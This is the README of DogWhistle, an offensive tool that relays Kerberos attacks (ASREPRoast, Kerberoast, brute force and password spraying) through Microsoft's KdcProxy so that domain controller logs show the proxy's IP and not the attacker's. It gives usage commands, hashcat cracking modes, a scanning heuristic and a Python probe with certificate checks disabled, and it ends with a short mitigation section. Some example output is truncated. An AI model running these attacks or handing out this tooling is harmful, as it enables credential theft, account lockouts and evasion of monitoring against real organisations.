DogWhistle

DogWhistle is a tool that interacts with the Microsoft KdcProxy service (KDC Proxy for Remote Access (syfuhs.net)). KdcProxy is commonly used with the following services to let external clients on the internet perform Kerberos requests against internal domain controllers:

  • Direct Access (tested)
    • Direct Access exposes the KdcProxy endpoint, and it is possible to interact with it even when DA itself requires a client certificate
  • Remote Desktop Gateway (not tested yet, but it should be the same service)
  • Microsoft also recommends setting up KdcProxy when using SMB over QUIC (SMB over QUIC | Microsoft Docs).

Logging gets interesting because the AD authentication logs (for example the Client Address in the domain controller's 4768/4771 Kerberos events) will show the source IP of the proxy, not of the real client. The only proxy-side log I found is C:\Windows\System32\LogFiles\HTTPERR, which only records failed HTTP requests. So an attacker who does not want to expose their own IP while performing malicious Kerberos requests can push them through the proxy to stay stealthy.

The tool can use the KdcProxy to perform Kerberos attacks such as ASREPRoast and Kerberoast, as well as plain brute force and password spraying.

Usage:

Ask TGT:           DogWhistle.exe asktgt <kdcproxy> <internal domain> <username> <password>

Bruteforce:        DogWhistle.exe bruteforce <kdcproxy> <internal domain> <username> <path-to-password-file>
                   BEWARE! KdcProxy locks authentication for about 10 minutes after 11 invalid attempts.
                   The internal domain password policy may lock the account sooner!

Password spray:    DogWhistle.exe spray <kdcproxy> <internal domain> <path-to-username-file> <password>

ASREPRoast:        DogWhistle.exe asreproast <kdcproxy> <internal domain> <username-without-pre-auth-req>

Kerberoast:        DogWhistle.exe kerberoast <kdcproxy> <internal domain> <username> <password> <spn>

Scan:              DogWhistle.exe scan <host/ip/range> <port>

Examples:
.\DogWhistle.exe asktgt https://192.0.2.200/KdcProxy pwn.lab administrator P@ssw0rd!
.\DogWhistle.exe scan 192.0.2.1-254 443

This tool does not perform server certificate validation!

Discovery:

The default URL for KdcProxy is https://host/KdcProxy. KdcProxy sends a TCP RST if it cannot interpret the request, and also sends a TCP RST if it cannot resolve a DNS SRV record for the requested user domain/realm. DogWhistle can guess whether a KdcProxy is available by sending a fake authentication request (the scan option). If the server responds with a RST instead of an HTTP status code, it is probably a KdcProxy.

In addition, KdcProxies can sometimes be found in the following registry key on domain connected machines:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Kerberos\KdcProxy\ProxyServers

On a server, if the KPSSVC service is running, a KdcProxy is running. "netsh http show urlacl" lists the HTTP.sys URL reservations and can be used to check whether the KdcProxy URL is registered on the host.
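The message framing behind the scan heuristic above, as an added Python example (this is not DogWhistle's code). A KdcProxy client wraps the length-prefixed Kerberos PDU in a DER KDC-PROXY-MESSAGE (MS-KKDCP) and POSTs it to the proxy URL; the proxy answers with the same structure around the KDC's reply, or resets the connection if it cannot parse the request or locate a KDC for the realm. The encoder/decoder below runs offline; probe_kdcproxy() sends a deliberately malformed blob and classifies the result. The "application/kerberos" content type is what MIT krb5's KKDCP client sends, and the junk blob b"\x6a\x00" (an empty AS-REQ tag) is an arbitrary choice; both are assumptions, not something the README states.

```python
"""MS-KKDCP KDC-PROXY-MESSAGE encoder/decoder plus a reset-vs-HTTP probe.
Added example, not part of DogWhistle. Assumed (not from the README):
Content-Type "application/kerberos" and the junk Kerberos blob b"\\x6a\\x00"."""
import http.client
import ssl
import struct
import sys
from typing import Optional
from urllib.parse import urlparse

# RFC 4120 [APPLICATION n] tags of the Kerberos PDUs a proxy message can carry
KRB_MSG_TYPES = {10: "AS-REQ", 11: "AS-REP", 12: "TGS-REQ", 13: "TGS-REP", 30: "KRB-ERROR"}


def der_len(n: int) -> bytes:
    """DER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + der_len(len(content)) + content


def der_int(n: int) -> bytes:
    """Minimal two's-complement DER INTEGER (one extra bit reserved for the sign)."""
    return der_tlv(0x02, n.to_bytes(max(1, (n.bit_length() + 8) // 8), "big", signed=True))


def der_read(buf: bytes, pos: int = 0):
    """Read one TLV at buf[pos]; returns (tag, content, position after the TLV)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


def build_kdc_proxy_message(kerb_message: bytes, target_domain: Optional[str] = None,
                            dclocator_hint: Optional[int] = None) -> bytes:
    """KDC-PROXY-MESSAGE ::= SEQUENCE { kerb-message [0] OCTET STRING,
    target-domain [1] KERB-REALM OPTIONAL, dclocator-hint [2] INTEGER OPTIONAL }
    kerb-message is the Kerberos PDU with its 4-byte big-endian TCP length prefix."""
    inner = der_tlv(0xA0, der_tlv(0x04, struct.pack(">I", len(kerb_message)) + kerb_message))
    if target_domain is not None:
        inner += der_tlv(0xA1, der_tlv(0x1B, target_domain.encode("ascii")))  # 0x1B = GeneralString
    if dclocator_hint is not None:
        inner += der_tlv(0xA2, der_int(dclocator_hint))
    return der_tlv(0x30, inner)


def parse_kdc_proxy_message(data: bytes) -> dict:
    """Decode a KDC-PROXY-MESSAGE (request or reply) into its fields."""
    tag, seq, _ = der_read(data)
    if tag != 0x30:
        raise ValueError("not a KDC-PROXY-MESSAGE SEQUENCE")
    fields, pos = {}, 0
    while pos < len(seq):
        ctag, content, pos = der_read(seq, pos)
        _, value, _ = der_read(content)        # unwrap the [n] EXPLICIT tag
        if ctag == 0xA0:
            (n,) = struct.unpack(">I", value[:4])
            fields["kerb_message"] = value[4:4 + n]
        elif ctag == 0xA1:
            fields["target_domain"] = value.decode("ascii")
        elif ctag == 0xA2:
            fields["dclocator_hint"] = int.from_bytes(value, "big", signed=True)
    return fields


def kerberos_message_type(kerb_message: bytes) -> str:
    """Name the Kerberos PDU by its [APPLICATION n] identifier octet (0x60 | n)."""
    first = kerb_message[0]
    if first & 0xE0 != 0x60:
        raise ValueError("not a Kerberos APPLICATION-tagged PDU")
    return KRB_MSG_TYPES.get(first & 0x1F, f"unknown({first & 0x1F})")


def probe_kdcproxy(url: str, realm: str, timeout: float = 5.0) -> str:
    """POST a junk Kerberos blob and classify the answer:
    'reset'  : connection reset/closed with no HTTP status (KdcProxy behaviour)
    'http N' : a normal HTTP status line came back (probably not a KdcProxy)
    'error'  : TLS or socket failure"""
    u = urlparse(url)
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE          # same trade-off as DogWhistle: lab use only
    conn = http.client.HTTPSConnection(u.hostname, u.port or 443, timeout=timeout, context=ctx)
    body = build_kdc_proxy_message(b"\x6a\x00", realm)   # empty AS-REQ tag: malformed on purpose
    try:
        conn.request("POST", u.path or "/KdcProxy", body=body,
                     headers={"Content-Type": "application/kerberos", "Connection": "close"})
        return f"http {conn.getresponse().status}"
    except ConnectionResetError:             # also covers http.client.RemoteDisconnected
        return "reset"
    except OSError:                          # ssl.SSLError and plain socket errors
        return "error"
    finally:
        conn.close()


if __name__ == "__main__":
    # usage: python kkdcp_probe.py https://192.0.2.200/KdcProxy PWN.LAB
    print(probe_kdcproxy(sys.argv[1], sys.argv[2]))
```

When the proxy does answer (for example to a well-formed AS-REQ), parse_kdc_proxy_message() and kerberos_message_type() tell you whether the KDC returned an AS-REP or a KRB-ERROR, which is the same distinction the asktgt, asreproast and spray modes rely on. Note that "reset" also covers a clean close without a status line, so treat it as a strong hint rather than proof.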

ASREPRoast:

.\DogWhistle.exe asreproast <kdcproxy> <internal domain> <username-without-pre-auth-req>

Run hashcat with -m 18200

Example:

.\DogWhistle.exe asreproast https://192.0.2.200/KdcProxy pwn.lab administrator
AS-REP Hash: [email protected

Kerberoast:

Requires a valid domain username and password. Kerberoastable accounts are usually enumerated via LDAP, which the tool does not do, so the account field in the output shows "unknown" for now.

.\DogWhistle.exe kerberoast <kdcproxy> <internal domain> <username> <password> <spn>

Run hashcat with -m 13100

Example:

.\DogWhistle.exe kerberoast https://da.pwn.com/KdcProxy pwn.lab [email protected] P@ssw0rd! MSSQLSvc/sqlsrv.pwn.lab:1433
TGS-REP hash: $krb5tgs$23$*unknown$PWN.LAB$MSSQLSvc/sqlsrv.pwn.lab

Mitigation

There are two settings in the following registry path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KPSSVC\Settings

DisallowUnprotectedPasswordAuth - When set to 1, the proxy rejects password-based authentication requests that are not armored with Flexible Authentication Secure Tunneling (FAST)

HttpsClientAuth - When set to 1, the proxy requires a client TLS certificate on the HTTPS connection

Both are REG_DWORD values; 0 disables the protection. Note that enabling these settings may break services that rely on the KdcProxy with clients that cannot do FAST or present a client certificate.

Even Microsoft's own SMB over QUIC documentation (linked below) turns both protections off:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\KPSSVC\Settings" /v HttpsClientAuth /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\KPSSVC\Settings" /v DisallowUnprotectedPasswordAuth /t REG_DWORD /d 0x0 /f

https://github.com/MicrosoftDocs/windowsserverdocs/blob/main/WindowsServerDocs/storage/file-server/smb-over-quic.md

TODO

  • Figure out the KdcProxy brute-force lockout and implement a timer so it doesn't trigger
  • Brute-force mode for ASREPRoast usernames and Kerberoast SPNs
  • Better detection with DNS integration (like Burp Collaborator)
  • Dig into Flexible Authentication Secure Tunneling (FAST)
  • Add encryption types other than RC4
  • Better command line handling

Credits

Inspired by Rubeus - https://github.com/GhostPack/Rubeus

Uses the fabulous Kerberos.NET library - https://github.com/dotnet/Kerberos.NET